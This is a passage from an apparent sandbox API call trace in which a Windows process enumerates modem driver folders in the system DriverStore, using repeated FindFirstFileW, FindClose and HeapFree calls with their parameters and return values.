ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.016] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcom1.inf_amd64_neutral_96c22c683482d8bd\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a39f500, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67aefc64, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67aefc64, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.017] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcommu.inf_amd64_neutral_83cc415156be45c8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a45dbe1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b3bf24, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b3bf24, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.017] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcomp.inf_amd64_neutral_e5ca2f01ca47bddb\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a4f6162, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b62084, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b62084, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.019] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq.inf_amd64_neutral_fbc4a14a6a13d0c8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3aa06f9e, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c3e9f0e, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c3e9f0e, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.020] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpq2.inf_amd64_neutral_e9784021af1f5e24\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a5b4843, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67b881e5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67b881e5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.020] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcpv.inf_amd64_neutral_5667cca434e3a6b7\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a64cdc4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bae345, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bae345, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.021] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcrtix.inf_amd64_neutral_e91a5dc0655e200a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a6e5346, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67bd44a5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67bd44a5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.021] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxhv6.inf_amd64_neutral_81ba64c5b6150dd3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b0515e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c363a89, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c363a89, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.023] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcxpv6.inf_amd64_neutral_f62ac4bd04e653d0\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50c81f21, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6c3d5eaa, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6c3d5eaa, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.026] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm5.inf_amd64_neutral_0bb09f3e5a59f3a8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a7c9b87, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c20766, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c20766, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.027] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdcm6.inf_amd64_neutral_b1db427ce3d2a1b4\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a8d4529, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c6ca26, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c6ca26, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.031] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdf56f.inf_amd64_neutral_26a79521b746fc31\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a992c0a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67c92b87, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67c92b87, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.031] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdgitn.inf_amd64_neutral_09132735f1063a47\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aa2b18c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cb8ce7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cb8ce7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.033] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdp2.inf_amd64_neutral_ab710894455d7b9a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4aac370d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67cdee47, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67cdee47, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.036] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdsi.inf_amd64_neutral_e77f438012239042\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ac404cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67d2b108, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67d2b108, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.036] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmdyna.inf_amd64_neutral_7e4d690d07ee94c1\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4adbd292, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67de97e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67de97e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.037] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeiger.inf_amd64_neutral_492d4e047d14bde9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ae7b974, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67e5bc0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67e5bc0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.037] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmelsa.inf_amd64_neutral_374f9d31af832d6b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4af86315, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ea7eca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ea7eca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.042] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric.inf_amd64_neutral_27c5b45728cc9ed0\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b090cb7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6817b8f0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6817b8f0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.042] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmeric2.inf_amd64_neutral_a0575ec9ce5c7de9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b129238, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681a1a50, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681a1a50, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.043] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmetech.inf_amd64_neutral_230358eeb58f0b3b\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b20da7a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681c7bb0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681c7bb0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.043] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmfj2.inf_amd64_neutral_9c9eb67d406a1632\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b2cc15b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x681edd10, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x681edd10, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.044] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgatew.inf_amd64_neutral_84eee4cc19fd00dc\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b3d6afd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68213e71, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68213e71, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.044] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.044] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgcs.inf_amd64_neutral_aafcd45e4e890862\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b4bb33f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68260131, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68260131, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.045] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgen.inf_amd64_neutral_7a967d06d569b1e4\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b59fb81, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x68286292, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x68286292, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.045] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl001.inf_amd64_neutral_9209e816461a1a73\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47580a6b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6610ccf4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6610ccf4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.046] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl002.inf_amd64_neutral_e204d4267d752eb7\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4768b40c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66158fb4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66158fb4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.046] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl003.inf_amd64_neutral_4c78da9e48068043\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4776fc4e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x661a5275, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x661a5275, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.047] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl004.inf_amd64_neutral_1874f16002601f78\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47e6dcfb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6642c9da, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6642c9da, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.048] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmgl005.inf_amd64_neutral_8b56291bfd2a4061\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48356a64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66857061, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66857061, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0031.048] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0031.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0031.048] 